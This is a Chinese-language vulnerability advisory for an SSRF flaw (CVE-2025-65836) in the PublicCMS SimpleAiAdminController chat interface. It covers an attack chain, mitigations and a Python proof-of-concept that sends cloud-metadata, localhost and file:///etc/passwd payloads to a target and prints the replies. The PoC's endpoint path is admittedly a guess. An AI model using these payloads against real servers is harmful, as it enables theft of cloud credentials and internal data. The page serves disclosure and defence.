CVE-2025-65836 PublicCMS SimpleAiAdminController SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-65836

漏洞类型

SSRF（服务器端请求伪造）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PublicCMS V5.202506.b

漏洞概述

CVE-2025-65836是PublicCMS V5.202506.b版本中的一个严重安全漏洞，位于SimpleAiAdminController的聊天接口中，攻击者可利用服务器端请求伪造（SSRF）技术发起攻击。该漏洞CVSS评分高达9.1，属于严重级别，攻击向量为网络攻击，无需认证和用户交互即可利用。攻击者可以通过构造恶意请求，迫使服务器向内部网络资源或外部恶意服务器发起请求，从而获取敏感信息、扫描内网服务或绕过防火墙限制。由于该漏洞影响机密性和完整性（均标记为高），攻击成功可能导致敏感数据泄露、内部服务被非法访问等严重后果。建议受影响用户尽快采取修复措施或临时缓解措施。

技术细节

该SSRF漏洞存在于PublicCMS的SimpleAiAdminController聊天接口中。攻击者通过在聊天请求中构造特殊的URL参数，利用服务器端点向攻击者控制的外部地址或内部网络地址发起请求。漏洞的根本原因在于应用程序未能对用户输入的URL进行充分的验证和过滤，允许攻击者指定任意目标地址。攻击者通常利用此漏洞进行内网端口扫描、读取本地文件（如file://协议）、访问内部管理接口或云元数据服务（如AWS 169.254.169.254）。由于服务器端点会处理请求响应，攻击者可以获取响应内容，从而实现信息探测和数据窃取。攻击者还可以利用DNS重绑定或301/302重定向绕过部分过滤机制。

攻击链分析

STEP 1

步骤1

攻击者识别目标PublicCMS V5.202506.b的SimpleAiAdminController聊天接口端点

STEP 2

步骤2

攻击者构造包含恶意URL的聊天请求消息，如http://169.254.169.254/latest/meta-data/

STEP 3

步骤3

服务器接收到请求后，未验证URL合法性，直接向攻击者指定的地址发起HTTP请求

STEP 4

步骤4

内部服务或云元数据服务响应请求，服务器将响应内容返回给攻击者

STEP 5

步骤5

攻击者获取内网敏感信息、云凭据或其他受限资源，实现信息泄露或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib3
urllib3.disable_warnings()

# CVE-2025-65836 SSRF PoC for PublicCMS V5.202506.b
# Target: SimpleAiAdminController chat interface

TARGET_URL = "http://target.com/publiccms/"  # Replace with target URL

def test_ssrf(target_url):
    """
    Test for SSRF vulnerability in SimpleAiAdminController
    Try accessing internal service or metadata endpoint
    """
    
    # Test payloads for SSRF
    payloads = [
        # AWS metadata endpoint
        "http://169.254.169.254/latest/meta-data/",
        # Internal service
        "http://localhost:8080/admin",
        # File protocol
        "file:///etc/passwd"
    ]
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    for payload in payloads:
        data = {
            "message": payload,
            "chatId": "test123"
        }
        
        try:
            # Adjust the endpoint based on actual SimpleAiAdminController path
            response = requests.post(
                f"{target_url}simpleAiAdmin/chat",
                json=data,
                headers=headers,
                timeout=10,
                verify=False
            )
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:500]}")
            print("-" * 50)
        except Exception as e:
            print(f"Error with payload {payload}: {e}")

if __name__ == "__main__":
    test_ssrf(TARGET_URL)

影响范围

PublicCMS V5.202506.b

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1）限制服务器网络访问权限，阻止对内部网段的访问；2）配置Web应用防火墙规则，检测并拦截包含内网IP（如10.x.x.x、172.16.x.x、192.168.x.x、127.0.0.1）或云元数据地址（169.254.169.254）的请求；3）禁用SimpleAiAdminController聊天功能或限制为受信任用户使用；4）实施网络分段，限制Web服务器对内部服务的访问权限。